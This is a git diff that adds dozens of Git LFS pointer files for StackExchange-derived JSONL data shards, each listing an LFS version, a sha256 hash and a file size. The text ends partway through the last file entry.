b/data/stackexchange/1-1/839_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..108341eb88da44d6c0ba7079dfc06e460ecc6317 --- /dev/null +++ b/data/stackexchange/1-1/839_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dc16785657bef99d7f0a9856ba3bdc562dbdfd6c3da5438dd89df2f6c22dc5e2 +size 35183945 diff --git a/data/stackexchange/1-1/83_2289.jsonl b/data/stackexchange/1-1/83_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..330f09f953b861376508e934d5f76306edfac45c --- /dev/null +++ b/data/stackexchange/1-1/83_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:057550864f14ca3032ef8473f13d3869381e5f573b600d038f7e8882ed1ac081 +size 39728615 diff --git a/data/stackexchange/1-1/840_2289.jsonl b/data/stackexchange/1-1/840_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b81fb791ea073eebde971cb5c242e73dfee9be7d --- /dev/null +++ b/data/stackexchange/1-1/840_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c6eeb2caafc22b4898600d26762cba607f033c4d1d4f7a258e4a129d309fffa +size 35300503 diff --git a/data/stackexchange/1-1/841_2289.jsonl b/data/stackexchange/1-1/841_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..458ac9b74f8cdff428094039fc4d06c14299c8fb --- /dev/null +++ b/data/stackexchange/1-1/841_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:621f29f9831aab87179756be4c6d4f18bea2e40bc81c7c973f601e89220d3d10 +size 34836507 diff --git a/data/stackexchange/1-1/842_2289.jsonl b/data/stackexchange/1-1/842_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b952a63b73506fe5269d223db97c09256f008011 --- /dev/null +++ b/data/stackexchange/1-1/842_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c285cc4adc4a703b05102c6a0cedfaefe8951aab1b1615bfd002a538c66a2623 +size 34665997 diff --git a/data/stackexchange/1-1/843_2289.jsonl b/data/stackexchange/1-1/843_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c66b1899175ef2a3b407b017aef5000ab414f41 --- /dev/null +++ b/data/stackexchange/1-1/843_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5fb1cbe0b909be77413f567c282acfa51c5c105b31503acf356ce19c8803f8a +size 34969602 diff --git a/data/stackexchange/1-1/844_2289.jsonl b/data/stackexchange/1-1/844_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63df13f4de41b9016d0d535598e09337c402e4da --- /dev/null +++ b/data/stackexchange/1-1/844_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aee7a8c01303445a9f23583a4434a20758203e21902dc1f7d3aebbb440e3bb2f +size 35299113 diff --git a/data/stackexchange/1-1/845_2289.jsonl b/data/stackexchange/1-1/845_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f1bf788913357af5a209a5eb9d08f2976cc2dc0a --- /dev/null +++ b/data/stackexchange/1-1/845_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb4c5aaaed4a02d900976891ccaa2534d7f675da5843fa36f72bdc5257c7902e +size 34989875 diff --git a/data/stackexchange/1-1/846_2289.jsonl b/data/stackexchange/1-1/846_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7aac6eb51802b036e34309462ce4924f4cdc6b6a --- /dev/null +++ b/data/stackexchange/1-1/846_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5064c8ffc169d9030b7044ff1cb12ce3f279775442b74f1bcf7bb6f93fde27eb +size 34871873 diff --git a/data/stackexchange/1-1/847_2289.jsonl b/data/stackexchange/1-1/847_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93b78a1844a34da77c78dd16ff4e0c67650ab65b --- /dev/null +++ b/data/stackexchange/1-1/847_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c9fdef1c5c04d9a334eec36179a1a42951bf05c6213605aa88deb1a485b373b +size 35260472 diff --git a/data/stackexchange/1-1/848_2289.jsonl b/data/stackexchange/1-1/848_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d197a8f584aecb140474122f93196d1087b077b --- /dev/null +++ b/data/stackexchange/1-1/848_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f04b08d7f5831601b363670dd11a7d8aeef03328ccdd0a4eed45595e0ce1f9f5 +size 35100030 diff --git a/data/stackexchange/1-1/849_2289.jsonl b/data/stackexchange/1-1/849_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6513258d6f5d23af7a0dca9e935e842a30e102e --- /dev/null +++ b/data/stackexchange/1-1/849_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1602fb8c52e79c45ad0c778800b2b7d2afc1bdf0b5ee5a6ebc55a64b848e2c78 +size 35164189 diff --git a/data/stackexchange/1-1/84_2289.jsonl b/data/stackexchange/1-1/84_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8977a612ff9d31621cab2ffbef406c93782d6f2 --- /dev/null +++ b/data/stackexchange/1-1/84_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d61ca1128b2b35c504c5ae28544a7180692495473ea0da01b8e39707a1ea4f67 +size 39506827 diff --git a/data/stackexchange/1-1/850_2289.jsonl b/data/stackexchange/1-1/850_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b40c1a1e1102c0ad35ac40b3b9e65c26aff1cc1e --- /dev/null +++ b/data/stackexchange/1-1/850_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ed37d3f9b7e6c32459233942729626b83dcb1089bfecc021dcdf74702129f3c +size 43785185 diff --git a/data/stackexchange/1-1/851_2289.jsonl b/data/stackexchange/1-1/851_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3434555304fc7ed47e3c21882480a462ebfca6d5 --- /dev/null +++ b/data/stackexchange/1-1/851_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:683a2e11cdff1893273f3cf4b408706d3bc6468d20571a7f01bfc6263a805707 +size 43289224 diff --git a/data/stackexchange/1-1/852_2289.jsonl b/data/stackexchange/1-1/852_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e8fb9405ca2375a9bb28d86b0338d3eb33b2192 --- /dev/null +++ b/data/stackexchange/1-1/852_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d2dcbbfdbd5e2db9572b6e2473b539309891bd1c2efeab9f5d5a7af32e82ea5 +size 42601245 diff --git a/data/stackexchange/1-1/853_2289.jsonl b/data/stackexchange/1-1/853_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bec596bb3c9520b3e38fd9d855faaa80a7334e1 --- /dev/null +++ b/data/stackexchange/1-1/853_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b078d5fd7e89b6c017281edce5d29f1a086d1305ef78aee92ccb37945f0923f +size 43904989 diff --git a/data/stackexchange/1-1/854_2289.jsonl b/data/stackexchange/1-1/854_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..92a82dcae32863f0278b1e7e4f063b767436b781 --- /dev/null +++ b/data/stackexchange/1-1/854_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:214f3f91f0ecaa4cf4733837b05fa41a4fd403986a22c48786f77608fc3e3a89 +size 43535610 diff --git a/data/stackexchange/1-1/855_2289.jsonl b/data/stackexchange/1-1/855_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a768e5be57edd3263945d96d76597f9df2bb9ba --- /dev/null +++ b/data/stackexchange/1-1/855_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9178598473969be5cc8c46730ae6d692faa5d7b9630239b0313b857b34409e4b +size 43207603 diff --git a/data/stackexchange/1-1/856_2289.jsonl b/data/stackexchange/1-1/856_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d1c6d9a19af981d4842114710dee446b4e016a4 --- /dev/null +++ b/data/stackexchange/1-1/856_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74bc8a16e99bf1568b3da2482bfdb1bfaddef0423b1e0a834ad3371d53461ba1 +size 43872659 diff --git a/data/stackexchange/1-1/857_2289.jsonl b/data/stackexchange/1-1/857_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b55c2eaf96e5c130bd0f363d69be045762d21367 --- /dev/null +++ b/data/stackexchange/1-1/857_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff7614f169701deda457e3c6c0d85f51bfea0a5a595768b36077ba28d8341c34 +size 44118566 diff --git a/data/stackexchange/1-1/858_2289.jsonl b/data/stackexchange/1-1/858_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c437879901abc36aa4c6f9d07bf1a4df8810df7e --- /dev/null +++ b/data/stackexchange/1-1/858_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:343e4dbd04472fa3a671246bc0a83d22c725047f77835339d0d9c7e1df342e76 +size 43577525 diff --git a/data/stackexchange/1-1/859_2289.jsonl b/data/stackexchange/1-1/859_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..983d756107e122e0ccca44a98803c43e1013e9b9 --- /dev/null +++ b/data/stackexchange/1-1/859_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ca294a56f96d3938b1830c8dfcdf03818e3b62fd4332a3594fbbb91610b7ca6 +size 42983559 diff --git a/data/stackexchange/1-1/85_2289.jsonl b/data/stackexchange/1-1/85_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b61c797753afabb5ba23a924ad224377a2410c7 --- /dev/null +++ b/data/stackexchange/1-1/85_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72fbc91f4ef40799283619555c3635d5371168dc96c0ec3b7a80851dc4bc9048 +size 39626974 diff --git a/data/stackexchange/1-1/860_2289.jsonl b/data/stackexchange/1-1/860_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e114bf2907b8557332901467db0ec5bc2b98e8d8 --- /dev/null +++ b/data/stackexchange/1-1/860_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ef5bdcc2e11e4e874a551c1492126f568d664b376319bcc7052992074fdc477 +size 42495286 diff --git a/data/stackexchange/1-1/861_2289.jsonl b/data/stackexchange/1-1/861_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4899e1e5872b706668f63e57867a3a45262a681 --- /dev/null +++ b/data/stackexchange/1-1/861_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64315442105aa29794a176756ffe9f7b99cb70fbe079a86e1931382858aac1c8 +size 43420367 diff --git a/data/stackexchange/1-1/862_2289.jsonl b/data/stackexchange/1-1/862_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..890f3a6ea75e5e1549cf9f7a9682c7fa173cdcf6 --- /dev/null +++ b/data/stackexchange/1-1/862_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:352428c3e528f42013f14d6bcd021733ebf567ba53b2253bb8f7e96983240786 +size 43635904 diff --git a/data/stackexchange/1-1/863_2289.jsonl b/data/stackexchange/1-1/863_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3298a16508584917860b652c0da48b929d1b288a --- /dev/null +++ b/data/stackexchange/1-1/863_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:433cc6bd5898e4d147e6392444b0053476b506e74e3bcfd4e91dd9189bc4506e +size 42705026 diff --git a/data/stackexchange/1-1/864_2289.jsonl b/data/stackexchange/1-1/864_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c01b89287396106a03034a59d2e024b8ae43dcd0 --- /dev/null +++ b/data/stackexchange/1-1/864_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac5abfc12d18ff3b8188045cfb6554d57f07c34ff1a02894c86f6179398cf313 +size 43289954 diff --git a/data/stackexchange/1-1/865_2289.jsonl b/data/stackexchange/1-1/865_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59a04c94326bc2df871ddc9aba40c42e073723ea --- /dev/null +++ b/data/stackexchange/1-1/865_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:795f00f73adc0a1c006ff852a6c71a6fc4aceeed2e6b09935b315862e002587e +size 43723177 diff --git a/data/stackexchange/1-1/866_2289.jsonl b/data/stackexchange/1-1/866_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3fbafb3fde277299a4de62216d0c1bb6c7d1c59 --- /dev/null +++ b/data/stackexchange/1-1/866_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46ca668ab0765aae36787cc794e40792d37923c0320ba1aefd15eb04e1b86988 +size 42873542 diff --git a/data/stackexchange/1-1/867_2289.jsonl b/data/stackexchange/1-1/867_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60ecc5c6260cf3e81832abadca3566b4874c7163 --- /dev/null +++ b/data/stackexchange/1-1/867_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47f4382a5d69861b77120746bd004a3934bfe99ee924f11223941c98073c49d0 +size 43773926 diff --git a/data/stackexchange/1-1/868_2289.jsonl b/data/stackexchange/1-1/868_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c3f2eada0c57e8fe1941dc23b4d93fe9182ac6e --- /dev/null +++ b/data/stackexchange/1-1/868_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:813095b8ff0c332f32b31172d94969bd179c61922023fa21fa7d190d61f1ef26 +size 43532472 diff --git a/data/stackexchange/1-1/869_2289.jsonl b/data/stackexchange/1-1/869_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd4c56c62c2ffc808d4c80ae197aac496c9eca65 --- /dev/null +++ b/data/stackexchange/1-1/869_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72c18d7f960743336bdf112fc7153d106ee728d64349ba6e76a762513699f4f6 +size 43066170 diff --git a/data/stackexchange/1-1/86_2289.jsonl b/data/stackexchange/1-1/86_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab44ef64d7dba5cf22873e7a1edc1015aa7d88bc --- /dev/null +++ b/data/stackexchange/1-1/86_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e5c262b4b851149f8323c4858d116dc344f6b30780f59262a42bc9ce1ce0e63 +size 39606815 diff --git a/data/stackexchange/1-1/870_2289.jsonl b/data/stackexchange/1-1/870_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..428bfef340afc0d2bb37284773af55cf5b84feac --- /dev/null +++ b/data/stackexchange/1-1/870_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33b0f77a8628e282acc4026a8c0cb4384ea8a319fe902cad8678603f99676d8d +size 43254771 diff --git a/data/stackexchange/1-1/871_2289.jsonl b/data/stackexchange/1-1/871_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..befa7f36840ab90e0b41ce8a1ecf6452b9309866 --- /dev/null +++ b/data/stackexchange/1-1/871_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e904061777057bd9966299e500185052359fc8fad60f5d6b6b2c501567eb937d +size 43355371 diff --git a/data/stackexchange/1-1/872_2289.jsonl b/data/stackexchange/1-1/872_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e69f3153e322649bce83b788f754faa4656511ac --- /dev/null +++ b/data/stackexchange/1-1/872_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b578907851b2118907cdea0aa64f06c9a6b82a7bd9fc5f6eec54f8b28d5a2d48 +size 43547381 diff --git a/data/stackexchange/1-1/873_2289.jsonl b/data/stackexchange/1-1/873_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b6d257a2dc5d9d6870b768d88dd17cad7a13608 --- /dev/null +++ b/data/stackexchange/1-1/873_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75086b349ca3163b374f129852f05c816346e0e3e2bfbce9537b8dc42e6c8e61 +size 43659063 diff --git a/data/stackexchange/1-1/874_2289.jsonl b/data/stackexchange/1-1/874_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..481956d3b7e742a1b0c6d2b486ff1dbed2fbd623 --- /dev/null +++ b/data/stackexchange/1-1/874_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee28b16522352e7dbb735757452bad0536ecfe2479ad55234add78adf58a9f92 +size 43134941 diff --git a/data/stackexchange/1-1/875_2289.jsonl b/data/stackexchange/1-1/875_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40ff07138a0829d9dbcebf0745f5ed87c65b0928 --- /dev/null +++ b/data/stackexchange/1-1/875_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4946e2689336b38544847c2250a7027a6cf25f620dec4684290f17924b53e9b +size 43025829 diff --git a/data/stackexchange/1-1/876_2289.jsonl b/data/stackexchange/1-1/876_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fbdc93917bf687f7a347892ad6f606b411f1a67 --- /dev/null +++ b/data/stackexchange/1-1/876_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:797f77da475b22255558a149233c06cdca05c51b6c85c6acf9ca6da2ea95da73 +size 43404819 diff --git a/data/stackexchange/1-1/877_2289.jsonl b/data/stackexchange/1-1/877_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad6d75fa73144d512a5124dc0dd68c34c5788877 --- /dev/null +++ b/data/stackexchange/1-1/877_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f2ee8643d2e88c081b3a43ce7f818510027f437b209f9b66180d632f4d275bf +size 42877113 diff --git a/data/stackexchange/1-1/878_2289.jsonl b/data/stackexchange/1-1/878_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d630eac166304c0b523525ed97938ecfc09752ac --- /dev/null +++ b/data/stackexchange/1-1/878_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48ec97990efab889874043c59a92d78bd8eafe295b73fc6f2b6175cf29fb46ce +size 43536131 diff --git a/data/stackexchange/1-1/879_2289.jsonl b/data/stackexchange/1-1/879_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e033357a1435789506a04d3af32cea139fd87f15 --- /dev/null +++ b/data/stackexchange/1-1/879_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fddc5d0aaca14d2a770a7ab0475a46e2e01b5796d9728cbffe48c331b013070 +size 43038589 diff --git a/data/stackexchange/1-1/87_2289.jsonl b/data/stackexchange/1-1/87_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ebd57d9dec90c7ad3a2216635f64911f8092410e --- /dev/null +++ b/data/stackexchange/1-1/87_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83c1c4e07e7539ff39135fcbea94cf27c0a30161ea385d8496fd079ff28f9a2d +size 38642618 diff --git a/data/stackexchange/1-1/880_2289.jsonl b/data/stackexchange/1-1/880_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d151595df8fa43bd8a3b8e63d8539d229b0df33 --- /dev/null +++ b/data/stackexchange/1-1/880_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2294463a18620994d276332e523b6af02bc7b10e4eaa2eeab04ae6332a08e5b5 +size 42470603 diff --git a/data/stackexchange/1-1/881_2289.jsonl b/data/stackexchange/1-1/881_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6dde8adffba0d69ce803539caf90e34f798c29e --- /dev/null +++ b/data/stackexchange/1-1/881_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5176e94186aea42163f0959f235d44ffd2f5582c145ceb911f2d4b6dcca7571 +size 43225294 diff --git a/data/stackexchange/1-1/882_2289.jsonl b/data/stackexchange/1-1/882_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..295820b05b43ede5cd92327db7966ec90f45aae8 --- /dev/null +++ b/data/stackexchange/1-1/882_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e107b27021b2818a77ec2b00700d1c6f19fa3b5ce3da5a8d7405405a0de2e4ff +size 43108556 diff --git a/data/stackexchange/1-1/883_2289.jsonl b/data/stackexchange/1-1/883_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac1a7806ec6e130d6c47c103855100ca78a12a72 --- /dev/null +++ b/data/stackexchange/1-1/883_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a42f9acadd19709e321d237de2a6c1c4457bf7497eef12d92370469f0f1ef39 +size 43523061 diff --git a/data/stackexchange/1-1/884_2289.jsonl b/data/stackexchange/1-1/884_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5cb80002a8e6874556c75d8770ef77f47139ea0a --- /dev/null +++ b/data/stackexchange/1-1/884_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6795aee0ea7cad518c7cc4b223bc03ad73b0a6f59e8649d3e3e0b65bcb6d2eb +size 43778928 diff --git a/data/stackexchange/1-1/885_2289.jsonl b/data/stackexchange/1-1/885_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e4c7d8a15362d0113bd629fdfc6864a9effc68a --- /dev/null +++ b/data/stackexchange/1-1/885_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:deee3b4fa0e3e36c717052a449e6e642e178480b04d03769251b717182172ca1 +size 43511630 diff --git a/data/stackexchange/1-1/886_2289.jsonl b/data/stackexchange/1-1/886_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd0cb10a5c3f3144c0ca2f50c4102be7c092a614 --- /dev/null +++ b/data/stackexchange/1-1/886_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19022c9c63bc8c443644cafebe5eeb78707ea080f8c3407417b00673150c78a3 +size 44084343 diff --git a/data/stackexchange/1-1/887_2289.jsonl b/data/stackexchange/1-1/887_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d01ecc4ed1a8312c615973eaf2f07c326f61294c --- /dev/null +++ b/data/stackexchange/1-1/887_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21394eab0eeb195c784296e94b0971325c3da82a29bb7eb450a0ccf8796970eb +size 44011160 diff --git a/data/stackexchange/1-1/888_2289.jsonl b/data/stackexchange/1-1/888_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..437e9ec30a898d4ba89e581d978a96ae4912406d --- /dev/null +++ b/data/stackexchange/1-1/888_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e034bbb2d29a2d0ed753e8849becde834285090a1bfe0b994619a75c1dd4c06 +size 43639549 diff --git a/data/stackexchange/1-1/889_2289.jsonl b/data/stackexchange/1-1/889_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f0330534aa81ead4dd46b3e687507a34b3df173 --- /dev/null +++ b/data/stackexchange/1-1/889_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09327a9325f400bffe1d46737b7c62d6d180f278ee1c209b65c508ccda85b0a9 +size 43487844 diff --git a/data/stackexchange/1-1/88_2289.jsonl b/data/stackexchange/1-1/88_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11c89de5539ab6ac82e5f857bb6ebb5cdaf1b7cd --- /dev/null +++ b/data/stackexchange/1-1/88_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1cd578e671d43de64c52a1e29f79d361fac5d6be783cb3f96fe158131c7fc701 +size 39598070 diff --git a/data/stackexchange/1-1/890_2289.jsonl b/data/stackexchange/1-1/890_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75ab36bc6faab4e6ecfcf972836168f9ee0354da --- /dev/null +++ b/data/stackexchange/1-1/890_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:108cc2e3f2a0406f5e22c98cc973b862406797660a244a95863c72acd4736a34 +size 43719534 diff --git a/data/stackexchange/1-1/891_2289.jsonl b/data/stackexchange/1-1/891_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d7bc5b6bdec370c3f7893abbc8e3e7410fd01cae --- /dev/null +++ b/data/stackexchange/1-1/891_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffa03d3541557c2913035f2be7da538e51c56b1964362363268a1f8dc1569830 +size 43150964 diff --git a/data/stackexchange/1-1/892_2289.jsonl b/data/stackexchange/1-1/892_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0d3a65286958caa4b90927cbd4183acd92e6e3f --- /dev/null +++ b/data/stackexchange/1-1/892_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b07795b692128faaae3467d595d9293737540c34e22c19ca11e44a1fb01020e +size 43761809 diff --git a/data/stackexchange/1-1/893_2289.jsonl b/data/stackexchange/1-1/893_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..def9739448b078af064b6213880c431052366c19 --- /dev/null +++ b/data/stackexchange/1-1/893_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbdd77e1df52ac868eff34acac5a050e8067a3388413b8e98d06044245d4db24 +size 43798364 diff --git a/data/stackexchange/1-1/894_2289.jsonl b/data/stackexchange/1-1/894_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83ac8c8bebf20dc043e98f610e4b73fba986bf08 --- /dev/null +++ b/data/stackexchange/1-1/894_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89e707a157a91c10645a17e02681e1622aa78f5af383599ef6598bb134522d40 +size 43436227 diff --git a/data/stackexchange/1-1/895_2289.jsonl b/data/stackexchange/1-1/895_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4be97364abc332ff5923b69296bd863ce38b0182 --- /dev/null +++ b/data/stackexchange/1-1/895_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5f9a2fc7355d640ca7f36615fdcbe71cdbc3028fab00d6f3ff1b192fd413ea5 +size 43568370 diff --git a/data/stackexchange/1-1/896_2289.jsonl b/data/stackexchange/1-1/896_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba273f1ad81d0886c4632a886ce80cfcea9330fb --- /dev/null +++ b/data/stackexchange/1-1/896_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4932113000f2fd89ddaeaf61d8bbb63d52cc124973cc61d91e0672eac0252718 +size 42997934 diff --git a/data/stackexchange/1-1/897_2289.jsonl b/data/stackexchange/1-1/897_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc13d6bb1815be436b0897dbbed5e7c8e47e69ff --- /dev/null +++ b/data/stackexchange/1-1/897_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05f8f9d15916e52d9f1ddc1b6245939bbaebefeb84792d2e963109ae58dadbdf +size 43525259 diff --git a/data/stackexchange/1-1/898_2289.jsonl b/data/stackexchange/1-1/898_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3e8ad5a4c8725bf9f3d7713b99197ea6a1430e5 --- /dev/null +++ b/data/stackexchange/1-1/898_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:441cc17b0aa804c32a3595cce2b4b621f3be087f86a724618d23ab9918df286f +size 43605206 diff --git a/data/stackexchange/1-1/899_2289.jsonl b/data/stackexchange/1-1/899_2289.jsonl new file mode 100644 index 